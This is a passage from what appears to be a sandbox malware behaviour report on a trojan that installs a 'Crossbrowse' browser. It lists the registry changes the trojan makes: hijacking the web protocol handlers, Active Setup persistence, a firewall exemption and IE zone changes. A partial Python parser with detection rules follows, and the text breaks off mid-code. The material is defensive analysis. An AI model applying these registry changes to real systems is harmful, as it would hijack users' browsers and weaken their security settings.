"BaseClass" = "Drive"
The Trojan deletes the following value(s) in system registry:
The Trojan disables automatic startup of the application by deleting the following autorun value:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"ethminer"
The process nsf7.tmp:644 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AE 65 11 C9 F4 CE 7D 97 76 89 2B EB AA 99 23 56"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\System\CurrentControlSet\Services\NlaSvc]
"CMPK" = "-obi-imi-tot-mdh-cpm-opw-crb-crr"
The process nst13.tmp:444 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0F 38 1A 96 64 21 41 21 44 A2 89 6E 14 9F BC E5"
[HKLM\SOFTWARE\Crossbrowse]
"Preinstall" = "1"
[HKCU\Software\Crossbrowse]
"Preinstall" = "1"
The process setup.exe:700 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Crossbrowse]
"VersionMajor" = "2171"
"NoRepair" = "1"
[HKCU\Software\Classes\ftp\shell]
"(Default)" = "open"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\Capabilities\URLAssociations]
"webcal" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsr1F.tmp\registry.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsr1F.tmp\, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsh22.tmp\registry.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsh22.tmp\, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsz27.tmp\nsProcess.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsz27.tmp\registry.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsz27.tmp\, , \??\%Program Files%\Crossbrowse\Crossbrowse,"
[HKCR\ftp\shell\open\command]
"(Default)" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe -- %1"
[HKCR\https\shell\open\command]
"(Default)" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe -- %1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Crossbrowse\Installer]
"InstallerSuccessLaunchCmdLine" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\Capabilities\FileAssociations]
".html" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\Capabilities\URLAssociations]
"ftp" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\InstallInfo]
"HideIconsCommand" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe --hide-icons"
"ReinstallCommand" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe --make-default-browser"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\Capabilities]
"ApplicationDescription" = "Crossbrowse is a web browser that runs webpages and applications with lightning speed. It's fast, stable, and easy to use. Browse the web more safely with malware and phishing protection built into Crossbrowse."
[HKLM\SOFTWARE\Crossbrowse\Installer]
"UninstallArguments" = " --uninstall --system-level"
[HKCR\.html\OpenWithProgids]
"CRSBRWSHTML" = ""
[HKLM\SOFTWARE\Crossbrowse\Installer]
"InstallerExtraCode1" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKCU\Software\Classes\http\shell\open\ddeexec]
"(Default)" = ""
[HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components]
"StubPath" = "%Program Files%\Crossbrowse\Crossbrowse\Application\39.6.2171.95\Installer\chrmstp.exe --configure-user-settings --verbose-logging --system-level"
[HKCR\.html]
"(Default)" = "CRSBRWSHTML"
[HKCU\Software\Classes\ftp]
"URL Protocol" = ""
[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\InstallInfo]
"IconsVisible" = "1"
[HKLM\SOFTWARE\Crossbrowse\Installer]
"oopcrashes" = "1"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\Capabilities\URLAssociations]
"sms" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\Capabilities]
"ApplicationName" = "Crossbrowse"
[HKLM\SOFTWARE\Crossbrowse\Installer]
"InstallerError" = "0"
[HKCU\Software\Classes\.xht]
"(Default)" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\shell\open\command]
"(Default)" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\Capabilities]
"ApplicationIcon" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe,0"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\Capabilities\FileAssociations]
".xht" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Crossbrowse]
"DisplayVersion" = "39.6.2171.95"
[HKCU\Software\Classes\.html]
"(Default)" = "CRSBRWSHTML"
[HKCU\Software\Classes\ftp\DefaultIcon]
"(Default)" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe,0"
[HKCU\Software\Classes\.shtml]
"(Default)" = "CRSBRWSHTML"
[HKCU\Software\Classes\https\shell\open\ddeexec]
"(Default)" = ""
[HKCR\CLSID\{2A563926-CF4B-4363-A760-F71E46205B7E}\LocalServer32]
"(Default)" = "%Program Files%\Crossbrowse\Crossbrowse\Application\39.6.2171.95\delegate_execute.exe"
[HKLM\SOFTWARE\Crossbrowse\Installer]
"ap" = "-stage:preconditions"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Crossbrowse]
"InstallLocation" = "%Program Files%\Crossbrowse\Crossbrowse\Application"
[HKCR\ftp\DefaultIcon]
"(Default)" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe,0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components]
"IsInstalled" = "1"
"Version" = "24,0,0,0"
[HKCR\https\shell]
"(Default)" = "open"
[HKCR\.xhtml]
"(Default)" = "CRSBRWSHTML"
[HKCR\.xht\OpenWithProgids]
"CRSBRWSHTML" = ""
[HKCR\ftp\shell\open\ddeexec]
"(Default)" = ""
[HKCU\Software\Classes\http\DefaultIcon]
"(Default)" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe,0"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\Capabilities\URLAssociations]
"nntp" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Classes\ftp\shell\open\command]
"(Default)" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe -- %1"
[HKCR\ftp]
"URL Protocol" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
[HKLM\SOFTWARE\Crossbrowse\Installer]
"UninstallString" = "%Program Files%\Crossbrowse\Crossbrowse\Application\39.6.2171.95\Installer\setup.exe"
[HKCR\HTTP\shell\open\ddeexec]
"(Default)" = ""
[HKCR\https\shell\open\ddeexec]
"(Default)" = ""
[HKCR\CRSBRWSHTML\DefaultIcon]
"(Default)" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe,0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Crossbrowse]
"DisplayName" = "Crossbrowse"
"UninstallString" = "%Program Files%\Crossbrowse\Crossbrowse\Application\39.6.2171.95\Installer\setup.exe --uninstall --system-level"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\Capabilities\URLAssociations]
"smsto" = "CRSBRWSHTML"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Classes\https\DefaultIcon]
"(Default)" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe,0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Crossbrowse]
"Version" = "39.6.2171.95"
[HKCR\https\DefaultIcon]
"(Default)" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe,0"
[HKCR\CRSBRWSHTML\shell\open\command]
"(Default)" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe -- %1"
[HKCR\.shtml\OpenWithProgids]
"CRSBRWSHTML" = ""
[HKCU\Software\Classes\https\shell]
"(Default)" = "open"
[HKCR\.webp\OpenWithProgids]
"CRSBRWSHTML" = ""
[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\Capabilities\FileAssociations]
".htm" = "CRSBRWSHTML"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\Capabilities\Startmenu]
"StartMenuInternet" = "Crossbrowse"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\Capabilities\URLAssociations]
"urn" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\Capabilities\FileAssociations]
".shtml" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\Capabilities\URLAssociations]
"tel" = "CRSBRWSHTML"
"irc" = "CRSBRWSHTML"
[HKCU\Software\Classes\http\shell]
"(Default)" = "open"
[HKCR\HTTP\shell]
"(Default)" = "open"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Crossbrowse]
"Publisher" = "The Crossbrowse Authors"
[HKCU\Software\Classes\http]
"URL Protocol" = ""
[HKCR\.shtml]
"(Default)" = "CRSBRWSHTML"
[HKCU\Software\Classes\https]
"URL Protocol" = ""
[HKCR\.htm\OpenWithProgids]
"CRSBRWSHTML" = ""
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DA E2 BF CA F7 DA FC 16 CE D5 90 DC 45 9F 54 61"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\Capabilities\URLAssociations]
"https" = "CRSBRWSHTML"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components]
"(Default)" = "Crossbrowse"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKCR\HTTP\DefaultIcon]
"(Default)" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe,0"
[HKCU\Software\Classes\.htm]
"(Default)" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Crossbrowse]
"DisplayIcon" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe,0"
[HKCR\https]
"URL Protocol" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\Crossbrowse\Installer]
"pv" = "39.6.2171.95"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Crossbrowse]
"InstallDate" = "20151106"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\InstallInfo]
"ShowIconsCommand" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe --show-icons"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\Capabilities\URLAssociations]
"mms" = "CRSBRWSHTML"
[HKCR\.htm]
"(Default)" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\crossbrowse.exe]
"Path" = "%Program Files%\Crossbrowse\Crossbrowse\Application"
[HKCR\HTTP]
"URL Protocol" = ""
[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse]
"(Default)" = "Crossbrowse"
[HKCU\Software\Classes\ftp\shell\open\ddeexec]
"(Default)" = ""
[HKCR\CLSID\{2A563926-CF4B-4363-A760-F71E46205B7E}]
"(Default)" = "CommandExecuteImpl Class"
[HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components]
"Localized Name" = "Crossbrowse"
[HKLM\SOFTWARE\Clients\StartMenuInternet]
"(Default)" = "Crossbrowse"
[HKCR\CRSBRWSHTML]
"(Default)" = "Crossbrowse HTML Document"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\Capabilities\URLAssociations]
"http" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Crossbrowse\Installer]
"Name" = "Crossbrowse"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\Capabilities\URLAssociations]
"mailto" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\Capabilities\FileAssociations]
".xhtml" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Crossbrowse]
"VersionMinor" = "95"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Crossbrowse]
"NoModify" = "1"
[HKLM\SOFTWARE\RegisteredApplications]
"Crossbrowse" = "Software\Clients\StartMenuInternet\Crossbrowse\Capabilities"
[HKCU\Software\Classes\.xhtml]
"(Default)" = "CRSBRWSHTML"
[HKCR\ftp\shell]
"(Default)" = "open"
[HKCR\.xhtml\OpenWithProgids]
"CRSBRWSHTML" = ""
[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\DefaultIcon]
"(Default)" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe,0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKCR\.xht]
"(Default)" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\Capabilities\URLAssociations]
"news" = "CRSBRWSHTML"
[HKCR\HTTP\shell\open\command]
"(Default)" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe -- %1"
[HKCR\CLSID\{2A563926-CF4B-4363-A760-F71E46205B7E}\LocalServer32]
"ServerExecutable" = "%Program Files%\Crossbrowse\Crossbrowse\Application\39.6.2171.95\delegate_execute.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\crossbrowse.exe]
"(Default)" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe"
[HKLM\SOFTWARE\Crossbrowse\Installer]
"InstallerResult" = "0"
[HKCU\Software\Clients\StartmenuInternet]
"(Default)" = "Crossbrowse"
[HKCU\Software\Classes\https\shell\open\command]
"(Default)" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe -- %1"
[HKCU\Software\Classes\http\shell\open\command]
"(Default)" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe -- %1"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\Capabilities\FileAssociations]
".webp" = "CRSBRWSHTML"
Adds a Windows Firewall exception (the XP SharedAccess policy store) that exempts crossbrowse.exe from inbound filtering; the `*` scope field means the exemption applies to traffic from any remote address:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Program Files%\Crossbrowse\Crossbrowse\Application]
"crossbrowse.exe" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe:*:Enabled:Crossbrowse"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Crossbrowse\Installer]
"ap"
"InstallerExtraCode1"
The process %original file name%.exe:468 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VOPackage]
"isnw" = "7"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ASPackage]
"isnw" = "7"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\APPackage]
"isnw" = "7"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "64 43 38 1C 63 38 0D 0F A6 83 E1 54 01 7D 63 1F"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\YSPackage]
"isnw" = "7"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE security-zone settings so that all network paths (UNCs) are treated as part of the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE security-zone settings so that all sites that bypass the proxy server are mapped to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE security-zone settings so that all local (intranet) sites not listed in other zones are mapped to the Intranet Zone (note that these three ZoneMap values at 1 are also IE's default Intranet Zone configuration, so by themselves they are weak indicators; the deleted proxy values listed below are the more telling change):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process nsmB.tmp:640 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "78 F9 1C 5E 9F 29 9A 65 19 9A A5 B7 59 B8 DC 03"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process amisid.exe:444 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"
"CategoryCount" = "16"
[HKCU\Software\InternetTurbo]
"UID" = "6FE5DDD064E91F40D31A83BB9FE8886E"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "06 60 4A 43 40 E6 9D 19 88 8A B7 65 64 7C C1 7A"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\ESENT\Process\amisid\DEBUG]
"Trace Level" = ""
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\ESENT\Process\amisid\DEBUG]
"Trace Level"
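The registry listing above is long and most of it is operating-system noise (Shell Folders, RNG seed, MountPoints2) that any program run on the sandbox would produce. The entries that matter to a responder are the ones that re-point the http/https/ftp protocol handlers and the HTML file class at crossbrowse.exe, clear the `ddeexec` keys, register an Active Setup component (which re-runs per user at logon), add the firewall exemption, and touch the IE ZoneMap. The following is an added example, not code from the report or from Lavasoft: a small parser for the report's own `[key]` / `"name" = "value"` listing format, with classification rules that are the author's heuristics (an assumption, not MAS categories). The sample text is a subset of entries copied from the listing above.

```python
"""Parse a MAS-style registry listing and bucket the security-relevant entries.
Added example: the category rules and the noise filter are the author's own
heuristics (assumptions); the sample entries are copied from the report above."""
import re
from collections import defaultdict

# Constructed sample: a subset of the entries in the report's listing.
SAMPLE = r'''
[HKCR\HTTP\shell\open\command]
"(Default)" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe -- %1"
[HKCR\HTTP\shell\open\ddeexec]
"(Default)" = ""
[HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components]
"IsInstalled" = "1"
"Version" = "24,0,0,0"
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Program Files%\Crossbrowse\Crossbrowse\Application]
"crossbrowse.exe" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe:*:Enabled:Crossbrowse"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DA E2 BF CA F7 DA FC 16 CE D5 90 DC 45 9F 54 61"
'''

KEY_RE = re.compile(r'^\[(.+)\]$')
VAL_RE = re.compile(r'^"([^"]*)"\s*=\s*"(.*)"$')


def parse_entries(text):
    """Yield (key, name, value) triples; a [key] line applies to the value lines below it."""
    key = None
    for line in text.splitlines():
        line = line.strip()
        m = KEY_RE.match(line)
        if m:
            key = m.group(1)
            continue
        m = VAL_RE.match(line)
        if m and key is not None:
            yield key, m.group(1), m.group(2)


# Heuristic categories (assumption: author's rules, first match wins).
RULES = [
    ("protocol_handler_hijack", re.compile(r'\\(http|https|ftp)\\shell\\open\\command$', re.I)),
    ("dde_disabled", re.compile(r'\\shell\\open\\ddeexec$', re.I)),
    ("active_setup_persistence", re.compile(r'\\Active Setup\\Installed Components', re.I)),
    ("firewall_exemption", re.compile(r'\\FirewallPolicy\\.*\\AuthorizedApplications\\List', re.I)),
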